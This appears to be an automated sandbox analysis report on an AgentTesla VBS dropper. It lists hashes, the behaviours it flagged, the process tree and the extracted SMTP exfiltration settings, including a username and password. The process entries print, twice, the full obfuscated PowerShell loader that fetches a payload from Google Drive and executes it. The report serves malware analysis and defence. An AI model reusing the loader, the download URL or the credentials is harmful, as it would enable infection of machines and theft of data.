Analysis
- max time kernel: 145s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 10/05/2024, 08:47
Static task: static1

Behavioral task: behavioral1
- Sample: 9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs
- Resource: win7-20240215-en

Behavioral task: behavioral2
- Sample: 9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs
- Resource: win10v2004-20240508-en
General
- Target: 9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs
- Size: 10KB
- MD5: 420b31e03f0aac291050345120dbb1c8
- SHA1: e0968e51e1f6d8f3335ef9b9d5dea2c3f2253079
- SHA256: 9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb
- SHA512: b5d3d8a5fc03ffb54a166b30f4bcdb1073fbdc08df5013b170321199f1939de630f596d058f44a5c4d9bae8f7f3130a6cd3b1d5a11d7f1d9753aee926f0dd7ac
- SSDEEP: 192:LIOoWa+tZFy6AA+1WHfa1vD7nSruBun2mF:LmW7y6AASOE7nSr0uBF
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Host: mail.blachownia.pl
- Port: 587
- Username: [email protected]
- Password: Zamowienia-2017
- Email To: [email protected]
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Blocklisted process makes network request (3 IoCs)
  flow 4, PID 2040, WScript.exe
  flow 8, PID 2984, powershell.exe
  flow 10, PID 2984, powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\fMNDB = "C:\\Users\\Admin\\AppData\\Roaming\\fMNDB\\fMNDB.exe" (process: wab.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow 7, drive.google.com
  flow 8, drive.google.com
  flow 12, drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  PID 2208, wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID 1672, powershell.exe
  PID 2208, wab.exe

Suspicious use of SetThreadContext (1 IoC)
  PID 1672 (powershell.exe) set thread context of PID 2208, procid_target 34

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  PID 2984, powershell.exe
  PID 1672, powershell.exe (2 entries)
  PID 2208, wab.exe (2 entries)

Suspicious behavior: MapViewOfSection (1 IoC)
  PID 1672, powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, PID 2984, powershell.exe
  Token: SeDebugPrivilege, PID 1672, powershell.exe
  Token: SeDebugPrivilege, PID 2208, wab.exe

Suspicious use of WriteProcessMemory (20 IoCs)
  PID 2040 (WScript.exe) wrote to memory of PID 2984, procid_target 29 (3 entries)
  PID 2984 (powershell.exe) wrote to memory of PID 2440, procid_target 31 (3 entries)
  PID 2984 (powershell.exe) wrote to memory of PID 1672, procid_target 32 (4 entries)
  PID 1672 (powershell.exe) wrote to memory of PID 2668, procid_target 33 (4 entries)
  PID 1672 (powershell.exe) wrote to memory of PID 2208, procid_target 34 (6 entries)
Processes

[depth 1] C:\Windows\System32\WScript.exe (PID 2040)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs"
  Signatures:
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory

[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2984, parent PID 2040), image path and command line as recorded:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . 
HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"2⤵
  Signatures:
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

[depth 3] C:\Windows\system32\cmd.exe (PID 2440, parent PID 2984)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"

[depth 3] C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (PID 1672, parent PID 2984), image path and command line as recorded:
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . 
HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"3⤵
  Signatures:
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

[depth 4] C:\Windows\SysWOW64\cmd.exe (PID 2668, parent PID 1672)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"

[depth 4] C:\Program Files (x86)\windows mail\wab.exe (PID 2208, parent PID 1672)
  Command line: "C:\Program Files (x86)\windows mail\wab.exe"
  Signatures:
  - Adds Run key to start application
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Downloads

Unnamed file
- Filesize: 65KB
- MD5: ac05d27423a85adc1622c714f2cb6184
- SHA1: b0fe2b1abddb97837ea0195be70ab2ff14d43198
- SHA256: c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
- SHA512: 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Unnamed file
- Filesize: 454KB
- MD5: fc62b80e164b7026eac50c83ad55770e
- SHA1: 0cd849e2fa77e57d94ebe8c5b7685474e2438e48
- SHA256: 473ff96f43544f04cb08a9e6faa4a72162ebd8e93363cb82cdd914f34eb38f1c
- SHA512: 924b368df010aecca6d7efb572ab0a8d7a5afaacb3c12b94877f0606efe113184180fdf47067d00004f49297c3978054abc0980b51c04b8e145d9e276041c8de

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCXMZGY2388JJPZYGBAU.temp
- Filesize: 7KB
- MD5: 6c46c14adf8b8d80199fa256656fc23f
- SHA1: d0a24dadd042739984c3ae8426d06e90dbf56157
- SHA256: 86466c333d85fe3d3b6dc9fc2abd9fdcc3c401ed21ea28a0a7004dd4f4532006
- SHA512: cda2ed0925191945bbd79033605bcadc36197cff04e8356e20f6f69dcc803a0b3fcf3f303caefb29cb2e55cf73176edc19aeb34364a800826bbc4908234943b4